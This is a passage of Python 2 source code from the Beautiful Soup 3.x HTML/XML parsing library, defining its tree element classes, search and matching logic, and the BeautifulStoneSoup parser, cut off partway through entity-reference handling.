BSD" from sgmllib import SGMLParser, SGMLParseError import codecs import markupbase import types import re import sgmllib try: from htmlentitydefs import name2codepoint except ImportError: name2codepoint = {} try: set except NameError: from sets import Set as set #These hacks make Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match DEFAULT_OUTPUT_ENCODING = "utf-8" # First, the classes that represent markup elements. class PageElement: """Contains the navigational information for some part of the page (either a tag or a piece of text)""" def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" self.parent = parent self.previous = previous self.next = None self.previousSibling = None self.nextSibling = None if self.parent and self.parent.contents: self.previousSibling = self.parent.contents[-1] self.previousSibling.nextSibling = self def replaceWith(self, replaceWith): oldParent = self.parent myIndex = self.parent.contents.index(self) if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent: # We're replacing this element with one of its siblings. index = self.parent.contents.index(replaceWith) if index and index < myIndex: # Furthermore, it comes before this element. That # means that when we extract it, the index of this # element will change. myIndex = myIndex - 1 self.extract() oldParent.insert(myIndex, replaceWith) def extract(self): """Destructively rips this element out of the tree.""" if self.parent: try: self.parent.contents.remove(self) except ValueError: pass #Find the two elements that would be next to each other if #this element (and any children) hadn't been parsed. Connect #the two. lastChild = self._lastRecursiveChild() nextElement = lastChild.next if self.previous: self.previous.next = nextElement if nextElement: nextElement.previous = self.previous self.previous = None lastChild.next = None self.parent = None if self.previousSibling: self.previousSibling.nextSibling = self.nextSibling if self.nextSibling: self.nextSibling.previousSibling = self.previousSibling self.previousSibling = self.nextSibling = None return self def _lastRecursiveChild(self): "Finds the last element beneath this object to be parsed." lastChild = self while hasattr(lastChild, 'contents') and lastChild.contents: lastChild = lastChild.contents[-1] return lastChild def insert(self, position, newChild): if (isinstance(newChild, basestring) or isinstance(newChild, unicode)) \ and not isinstance(newChild, NavigableString): newChild = NavigableString(newChild) position = min(position, len(self.contents)) if hasattr(newChild, 'parent') and newChild.parent != None: # We're 'inserting' an element that's already one # of this object's children. if newChild.parent == self: index = self.find(newChild) if index and index < position: # Furthermore we're moving it further down the # list of this object's children. That means that # when we extract this element, our target index # will jump down one. position = position - 1 newChild.extract() newChild.parent = self previousChild = None if position == 0: newChild.previousSibling = None newChild.previous = self else: previousChild = self.contents[position-1] newChild.previousSibling = previousChild newChild.previousSibling.nextSibling = newChild newChild.previous = previousChild._lastRecursiveChild() if newChild.previous: newChild.previous.next = newChild newChildsLastElement = newChild._lastRecursiveChild() if position >= len(self.contents): newChild.nextSibling = None parent = self parentsNextSibling = None while not parentsNextSibling: parentsNextSibling = parent.nextSibling parent = parent.parent if not parent: # This is the last element in the document. break if parentsNextSibling: newChildsLastElement.next = parentsNextSibling else: newChildsLastElement.next = None else: nextChild = self.contents[position] newChild.nextSibling = nextChild if newChild.nextSibling: newChild.nextSibling.previousSibling = newChild newChildsLastElement.next = nextChild if newChildsLastElement.next: newChildsLastElement.next.previous = newChildsLastElement self.contents.insert(position, newChild) def append(self, tag): """Appends the given tag to the contents of this tag.""" self.insert(len(self.contents), tag) def findNext(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findAllNext, name, attrs, text, **kwargs) def findAllNext(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextGenerator, **kwargs) def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findNextSiblings, name, attrs, text, **kwargs) def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextSiblingGenerator, **kwargs) fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x def findPrevious(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousGenerator, **kwargs) fetchPrevious = findAllPrevious # Compatibility with pre-3.x def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findPreviousSiblings, name, attrs, text, **kwargs) def findPreviousSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousSiblingGenerator, **kwargs) fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x def findParent(self, name=None, attrs={}, **kwargs): """Returns the closest parent of this Tag that matches the given criteria.""" # NOTE: We can't use _findOne because findParents takes a different # set of arguments. r = None l = self.findParents(name, attrs, 1) if l: r = l[0] return r def findParents(self, name=None, attrs={}, limit=None, **kwargs): """Returns the parents of this Tag that match the given criteria.""" return self._findAll(name, attrs, None, limit, self.parentGenerator, **kwargs) fetchParents = findParents # Compatibility with pre-3.x #These methods do the real heavy lifting. def _findOne(self, method, name, attrs, text, **kwargs): r = None l = method(name, attrs, text, 1, **kwargs) if l: r = l[0] return r def _findAll(self, name, attrs, text, limit, generator, **kwargs): "Iterates over a generator looking for things that match." if isinstance(name, SoupStrainer): strainer = name else: # Build a SoupStrainer strainer = SoupStrainer(name, attrs, text, **kwargs) results = ResultSet(strainer) g = generator() while True: try: i = g.next() except StopIteration: break if i: found = strainer.search(i) if found: results.append(found) if limit and len(results) >= limit: break return results #These Generators can be used to navigate starting from both #NavigableStrings and Tags. def nextGenerator(self): i = self while i: i = i.next yield i def nextSiblingGenerator(self): i = self while i: i = i.nextSibling yield i def previousGenerator(self): i = self while i: i = i.previous yield i def previousSiblingGenerator(self): i = self while i: i = i.previousSibling yield i def parentGenerator(self): i = self while i: i = i.parent yield i # Utility methods def substituteEncoding(self, str, encoding=None): encoding = encoding or "utf-8" return str.replace("%SOUP-ENCODING%", encoding) def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" if isinstance(s, unicode): if encoding: s = s.encode(encoding) elif isinstance(s, str): if encoding: s = s.encode(encoding) else: s = unicode(s) else: if encoding: s = self.toEncoding(str(s), encoding) else: s = unicode(s) return s class NavigableString(unicode, PageElement): def __new__(cls, value): """Create a new NavigableString. When unpickling a NavigableString, this method is called with the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. """ if isinstance(value, unicode): return unicode.__new__(cls, value) return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) def __getnewargs__(self): return (NavigableString.__str__(self),) def __getattr__(self, attr): """text.string gives you text. This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.""" if attr == 'string': return self else: raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): if encoding: return self.encode(encoding) else: return self class CData(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding) class ProcessingInstruction(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): output = self if "%SOUP-ENCODING%" in output: output = self.substituteEncoding(output, encoding) return "<?%s?>" % self.toEncoding(output, encoding) class Comment(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!--%s-->" % NavigableString.__str__(self, encoding) class Declaration(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!%s>" % NavigableString.__str__(self, encoding) class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" def _invert(h): "Cheap function to invert a hash." i = {} for k,v in h.items(): i[v] = k return i XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", "quot" : '"', "amp" : "&", "lt" : "<", "gt" : ">" } XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" x = match.group(1) if self.convertHTMLEntities and x in name2codepoint: return unichr(name2codepoint[x]) elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: if self.convertXMLEntities: return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] else: return u'&%s;' % x elif len(x) > 0 and x[0] == '#': # Handle numeric entities if len(x) > 1 and x[1] == 'x': return unichr(int(x[2:], 16)) else: return unichr(int(x[1:])) elif self.escapeUnrecognizedEntities: return u'&amp;%s;' % x else: return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): "Basic constructor." # We don't actually store the parser object: that lets extracted # chunks be garbage-collected self.parserClass = parser.__class__ self.isSelfClosing = parser.isSelfClosingTag(name) self.name = name if attrs == None: attrs = [] self.attrs = attrs self.contents = [] self.setup(parent, previous) self.hidden = False self.containsSubstitutions = False self.convertHTMLEntities = parser.convertHTMLEntities self.convertXMLEntities = parser.convertXMLEntities self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. convert = lambda(k, val): (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", self._convertEntities, val)) self.attrs = map(convert, self.attrs) def get(self, key, default=None): """Returns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.""" return self._getAttrMap().get(key, default) def has_key(self, key): return self._getAttrMap().has_key(key) def __getitem__(self, key): """tag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.""" return self._getAttrMap()[key] def __iter__(self): "Iterating over a tag iterates over its contents." return iter(self.contents) def __len__(self): "The length of a tag is the length of its list of contents." return len(self.contents) def __contains__(self, x): return x in self.contents def __nonzero__(self): "A tag is non-None even if it has no contents." return True def __setitem__(self, key, value): """Setting tag[key] sets the value of the 'key' attribute for the tag.""" self._getAttrMap() self.attrMap[key] = value found = False for i in range(0, len(self.attrs)): if self.attrs[i][0] == key: self.attrs[i] = (key, value) found = True if not found: self.attrs.append((key, value)) self._getAttrMap()[key] = value def __delitem__(self, key): "Deleting tag[key] deletes all 'key' attributes for the tag." for item in self.attrs: if item[0] == key: self.attrs.remove(item) #We don't break because bad HTML can define the same #attribute multiple times. self._getAttrMap() if self.attrMap.has_key(key): del self.attrMap[key] def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" return apply(self.findAll, args, kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?""" if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): return False for i in range(0, len(self.contents)): if self.contents[i] != other.contents[i]: return False return True def __ne__(self, other): """Returns true iff this tag is not identical to the other tag, as defined in __eq__.""" return not self == other def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): """Renders this tag as a string.""" return self.__str__(encoding) def __unicode__(self): return self.__str__(None) BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + ")") def _sub_entity(self, x): """Used with a regular expression to substitute the appropriate XML entity for an XML special character.""" return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.""" encodedName = self.toEncoding(self.name, encoding) attrs = [] if self.attrs: for key, val in self.attrs: fmt = '%s="%s"' if isString(val): if self.containsSubstitutions and '%SOUP-ENCODING%' in val: val = self.substituteEncoding(val, encoding) # The attribute value either: # # * Contains no embedded double quotes or single quotes. # No problem: we enclose it in double quotes. # * Contains embedded single quotes. No problem: # double quotes work here too. # * Contains embedded double quotes. No problem: # we enclose it in single quotes. # * Embeds both single _and_ double quotes. This # can't happen naturally, but it can happen if # you modify an attribute value after parsing # the document. Now we have a bit of a # problem. We solve it by enclosing the # attribute in single quotes, and escaping any # embedded single quotes to XML entities. if '"' in val: fmt = "%s='%s'" if "'" in val: # TODO: replace with apos when # appropriate. val = val.replace("'", "&squot;") # Now we're okay w/r/t quotes. But the attribute # value might also contain angle brackets, or # ampersands that aren't part of entities. We need # to escape those to XML entities too. val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) attrs.append(fmt % (self.toEncoding(key, encoding), self.toEncoding(val, encoding))) close = '' closeTag = '' if self.isSelfClosing: close = ' /' else: closeTag = '</%s>' % encodedName indentTag, indentContents = 0, 0 if prettyPrint: indentTag = indentLevel space = (' ' * (indentTag-1)) indentContents = indentTag + 1 contents = self.renderContents(encoding, prettyPrint, indentContents) if self.hidden: s = contents else: s = [] attributeString = '' if attrs: attributeString = ' ' + ' '.join(attrs) if prettyPrint: s.append(space) s.append('<%s%s%s>' % (encodedName, attributeString, close)) if prettyPrint: s.append("\n") s.append(contents) if prettyPrint and contents and contents[-1] != "\n": s.append("\n") if prettyPrint and closeTag: s.append(space) s.append(closeTag) if prettyPrint and closeTag and self.nextSibling: s.append("\n") s = ''.join(s) return s def decompose(self): """Recursively destroys the contents of this tree.""" contents = [i for i in self.contents] for i in contents: if isinstance(i, Tag): i.decompose() else: i.extract() self.extract() def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): return self.__str__(encoding, True) def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..""" s=[] for c in self: text = None if isinstance(c, NavigableString): text = c.__str__(encoding) elif isinstance(c, Tag): s.append(c.__str__(encoding, prettyPrint, indentLevel)) if text and prettyPrint: text = text.strip() if text: if prettyPrint: s.append(" " * (indentLevel-1)) s.append(text) if prettyPrint: s.append("\n") return ''.join(s) #Soup methods def find(self, name=None, attrs={}, recursive=True, text=None, **kwargs): """Return only the first child of this Tag matching the given criteria.""" r = None l = self.findAll(name, attrs, recursive, text, 1, **kwargs) if l: r = l[0] return r findChild = find def findAll(self, name=None, attrs={}, recursive=True, text=None, limit=None, **kwargs): """Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. The same is true of the tag name.""" generator = self.recursiveChildGenerator if not recursive: generator = self.childGenerator return self._findAll(name, attrs, text, limit, generator, **kwargs) findChildren = findAll # Pre-3.x compatibility methods first = find fetch = findAll def fetchText(self, text=None, recursive=True, limit=None): return self.findAll(text=text, recursive=recursive, limit=limit) def firstText(self, text=None, recursive=True): return self.find(text=text, recursive=recursive) #Private methods def _getAttrMap(self): """Initializes a map representation of this tag's attributes, if not already initialized.""" if not getattr(self, 'attrMap'): self.attrMap = {} for (key, value) in self.attrs: self.attrMap[key] = value return self.attrMap #Generator methods def childGenerator(self): for i in range(0, len(self.contents)): yield self.contents[i] raise StopIteration def recursiveChildGenerator(self): stack = [(self, 0)] while stack: tag, start = stack.pop() if isinstance(tag, Tag): for i in range(start, len(tag.contents)): a = tag.contents[i] yield a if isinstance(a, Tag) and tag.contents: if i < len(tag.contents) - 1: stack.append((tag, i+1)) stack.append((a, 0)) break raise StopIteration # Next, a couple classes to represent queries and their results. class SoupStrainer: """Encapsulates a number of ways of matching a markup element (tag or text).""" def __init__(self, name=None, attrs={}, text=None, **kwargs): self.name = name if isString(attrs): kwargs['class'] = attrs attrs = None if kwargs: if attrs: attrs = attrs.copy() attrs.update(kwargs) else: attrs = kwargs self.attrs = attrs self.text = text def __str__(self): if self.text: return self.text else: return "%s|%s" % (self.name, self.attrs) def searchTag(self, markupName=None, markupAttrs={}): found = None markup = None if isinstance(markupName, Tag): markup = markupName markupAttrs = markup callFunctionWithTagData = callable(self.name) \ and not isinstance(markupName, Tag) if (not self.name) \ or callFunctionWithTagData \ or (markup and self._matches(markup, self.name)) \ or (not markup and self._matches(markupName, self.name)): if callFunctionWithTagData: match = self.name(markupName, markupAttrs) else: match = True markupAttrMap = None for attr, matchAgainst in self.attrs.items(): if not markupAttrMap: if hasattr(markupAttrs, 'get'): markupAttrMap = markupAttrs else: markupAttrMap = {} for k,v in markupAttrs: markupAttrMap[k] = v attrValue = markupAttrMap.get(attr) if not self._matches(attrValue, matchAgainst): match = False break if match: if markup: found = markup else: found = markupName return found def search(self, markup): #print 'looking for %s in %s' % (self, markup) found = None # If given a list of items, scan it for a text element that # matches. if isList(markup) and not isinstance(markup, Tag): for element in markup: if isinstance(element, NavigableString) \ and self.search(element): found = element break # If it's a Tag, make sure its name or attributes match. # Don't bother with Tags if we're searching for text. elif isinstance(markup, Tag): if not self.text: found = self.searchTag(markup) # If it's text, make sure the text matches. elif isinstance(markup, NavigableString) or \ isString(markup): if self._matches(markup, self.text): found = markup else: raise Exception, "I don't know how to match against a %s" \ % markup.__class__ return found def _matches(self, markup, matchAgainst): #print "Matching %s against %s" % (markup, matchAgainst) result = False if matchAgainst == True and type(matchAgainst) == types.BooleanType: result = markup != None elif callable(matchAgainst): result = matchAgainst(markup) else: #Custom match methods take the tag as an argument, but all #other ways of matching match the tag name as a string. if isinstance(markup, Tag): markup = markup.name if markup and not isString(markup): markup = unicode(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. result = markup and matchAgainst.search(markup) elif isList(matchAgainst): result = markup in matchAgainst elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isString(markup): if isinstance(markup, unicode): matchAgainst = unicode(matchAgainst) else: matchAgainst = str(matchAgainst) if not result: result = matchAgainst == markup return result class ResultSet(list): """A ResultSet is just a list that keeps track of the SoupStrainer that created it.""" def __init__(self, source): list.__init__([]) self.source = source # Now, some helper functions. def isList(l): """Convenience method that works with all 2.x versions of Python to determine whether or not something is listlike.""" return hasattr(l, '__iter__') \ or (type(l) in (types.ListType, types.TupleType)) def isString(s): """Convenience method that works with all 2.x versions of Python to determine whether or not something is stringlike.""" try: return isinstance(s, unicode) or isinstance(s, basestring) except NameError: return isinstance(s, str) def buildTagMap(default, *args): """Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.""" built = {} for portion in args: if hasattr(portion, 'items'): #It's a map. Merge it. for k,v in portion.items(): built[k] = v elif isList(portion): #It's a list. Map each item to the default. for k in portion: built[k] = default else: #It's a scalar. Map it to the default. built[portion] = default return built # Now, the parser classes. class BeautifulStoneSoup(Tag, SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.""" SELF_CLOSING_TAGS = {} NESTABLE_TAGS = {} RESET_NESTING_TAGS = {} QUOTE_TAGS = {} PRESERVE_WHITESPACE_TAGS = [] MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), (re.compile('<!\s+([^<>]*)>'), lambda x: '<!' + x.group(1) + '>') ] ROOT_TAG_NAME = u'[document]' HTML_ENTITIES = "html" XML_ENTITIES = "xml" XHTML_ENTITIES = "xhtml" # TODO: This only exists for backwards-compatibility ALL_ENTITIES = XHTML_ENTITIES # Used when determining whether a text node is all whitespace and # can be replaced with a single space. A text node that contains # fancy Unicode spaces (usually non-breaking) should be left # alone. STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, markupMassage=True, smartQuotesTo=XML_ENTITIES, convertEntities=None, selfClosingTags=None, isHTML=False): """The Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.""" self.parseOnlyThese = parseOnlyThese self.fromEncoding = fromEncoding self.smartQuotesTo = smartQuotesTo self.convertEntities = convertEntities # Set the rules for how we'll deal with the entities we # encounter if self.convertEntities: # It doesn't make sense to convert encoded characters to # entities even while you're converting entities to Unicode. # Just convert it all to Unicode. self.smartQuotesTo = None if convertEntities == self.HTML_ENTITIES: self.convertXMLEntities = False self.convertHTMLEntities = True self.escapeUnrecognizedEntities = True elif convertEntities == self.XHTML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = True self.escapeUnrecognizedEntities = False elif convertEntities == self.XML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False else: self.convertXMLEntities = False self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() self.markup = markup self.markupMassage = markupMassage try: self._feed(isHTML=isHTML) except StopParsing: pass self.markup = None # The markup can now be GCed def convert_charref(self, name): """This method fixes a bug in Python's SGMLParser.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127 : # ASCII ends at 127, not 255 return return self.convert_codepoint(n) def _feed(self, inDocumentEncoding=None, isHTML=False): # Convert the document to Unicode. markup = self.markup if isinstance(markup, unicode): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: dammit = UnicodeDammit\ (markup, [self.fromEncoding, inDocumentEncoding], smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) markup = dammit.unicode self.originalEncoding = dammit.originalEncoding self.declaredHTMLEncoding = dammit.declaredHTMLEncoding if markup: if self.markupMassage: if not isList(self.markupMassage): self.markupMassage = self.MARKUP_MASSAGE for fix, m in self.markupMassage: markup = fix.sub(m, markup) # TODO: We get rid of markupMassage so that the # soup object can be deepcopied later on. Some # Python installations can't copy regexes. If anyone # was relying on the existence of markupMassage, this # might cause problems. del(self.markupMassage) self.reset() SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: self.popTag() def __getattr__(self, methodName): """This method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.""" #print "__getattr__ called on %s.%s" % (self.__class__, methodName) if methodName.find('start_') == 0 or methodName.find('end_') == 0 \ or methodName.find('do_') == 0: return SGMLParser.__getattr__(self, methodName) elif methodName.find('__') != 0: return Tag.__getattr__(self, methodName) else: raise AttributeError def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" return self.SELF_CLOSING_TAGS.has_key(name) \ or self.instanceSelfClosingTags.has_key(name) def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] self.quoteStack = [] self.pushTag(self) def popTag(self): tag = self.tagStack.pop() # Tags with just one string-owning child get the child as a # 'string' property, so that soup.tag.string is shorthand for # soup.tag.contents[0] if len(self.currentTag.contents) == 1 and \ isinstance(self.currentTag.contents[0], NavigableString): self.currentTag.string = self.currentTag.contents[0] #print "Pop", tag.name if self.tagStack: self.currentTag = self.tagStack[-1] return self.currentTag def pushTag(self, tag): #print "Push", tag.name if self.currentTag: self.currentTag.contents.append(tag) self.tagStack.append(tag) self.currentTag = self.tagStack[-1] def endData(self, containerClass=NavigableString): if self.currentData: currentData = u''.join(self.currentData) if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and not set([tag.name for tag in self.tagStack]).intersection( self.PRESERVE_WHITESPACE_TAGS)): if '\n' in currentData: currentData = '\n' else: currentData = ' ' self.currentData = [] if self.parseOnlyThese and len(self.tagStack) <= 1 and \ (not self.parseOnlyThese.text or \ not self.parseOnlyThese.search(currentData)): return o = containerClass(currentData) o.setup(self.currentTag, self.previous) if self.previous: self.previous.next = o self.previous = o self.currentTag.contents.append(o) def _popToTag(self, name, inclusivePop=True): """Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.""" #print "Popping to %s" % name if name == self.ROOT_TAG_NAME: return numPops = 0 mostRecentTag = None for i in range(len(self.tagStack)-1, 0, -1): if name == self.tagStack[i].name: numPops = len(self.tagStack)-i break if not inclusivePop: numPops = numPops - 1 for i in range(0, numPops): mostRecentTag = self.popTag() return mostRecentTag def _smartPop(self, name): """We need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' """ nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable = nestingResetTriggers != None isResetNesting = self.RESET_NESTING_TAGS.has_key(name) popTo = None inclusive = True for i in range(len(self.tagStack)-1, 0, -1): p = self.tagStack[i] if (not p or p.name == name) and not isNestable: #Non-nestable tags get popped to the top or to their #last occurance. popTo = name break if (nestingResetTriggers != None and p.name in nestingResetTriggers) \ or (nestingResetTriggers == None and isResetNesting and self.RESET_NESTING_TAGS.has_key(p.name)): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag #that causes nesting to reset, pop up to but not #including that tag. popTo = p.name inclusive = False break p = p.parent if popTo: self._popToTag(popTo, inclusive) def unknown_starttag(self, name, attrs, selfClosing=0): #print "Start tag %s: %s" % (name, attrs) if self.quoteStack: #This is not a real tag. #print "<%s> is not real!" % name attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs)) self.handle_data('<%s%s>' % (name, attrs)) return self.endData() if not self.isSelfClosingTag(name) and not selfClosing: self._smartPop(name) if self.parseOnlyThese and len(self.tagStack) <= 1 \ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): return tag = Tag(self, name, attrs, self.currentTag, self.previous) if self.previous: self.previous.next = tag self.previous = tag self.pushTag(tag) if selfClosing or self.isSelfClosingTag(name): self.popTag() if name in self.QUOTE_TAGS: #print "Beginning quote (%s)" % name self.quoteStack.append(name) self.literal = 1 return tag def unknown_endtag(self, name): #print "End tag %s" % name if self.quoteStack and self.quoteStack[-1] != name: #This is not a real end tag. #print "</%s> is not real!" % name self.handle_data('</%s>' % name) return self.endData() self._popToTag(name) if self.quoteStack and self.quoteStack[-1] == name: self.quoteStack.pop() self.literal = (len(self.quoteStack) > 0) def handle_data(self, data): self.currentData.append(data) def _toStringSubclass(self, text, subclass): """Adds a certain piece of text to the tree as a NavigableString subclass.""" self.endData() self.handle_data(text) self.endData(subclass) def handle_pi(self, text): """Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.""" if text[:3] == "xml": text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" self._toStringSubclass(text, ProcessingInstruction) def handle_comment(self, text): "Handle comments as Comment objects." self._toStringSubclass(text, Comment) def handle_charref(self, ref): "Handle character references as data." if self.convertEntities: data = unichr(int(ref)) else: data = '&#%s;' % ref self.handle_data(data) def handle_entityref(self, ref): """Handle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.""" data = None if self.convertHTMLEntities: try: data = unichr(name2codepoint[ref]) except KeyError: pass if not data and self.convertXMLEntities: data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) if not data and self.convertHTMLEntities and \ not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): # TODO: We've got a problem here. We're told this is # an entity reference, but it's not an XML entity # reference or an HTML entity reference. Nonetheless, # the logical thing to do is to pass it through as an # unrecognized entity reference. # # Except: when the input is "&carol;" this function # will be called with input "carol". When the input is # "AT&T", this function will be called with input # "T". We have no way of knowing whether a semicolon # was present originally, so we don't know whether # this is an unknown entity or just a misplaced # ampersand. # # The more common case is a misplaced ampersand, so I # escape the ampersand and omit the trailing 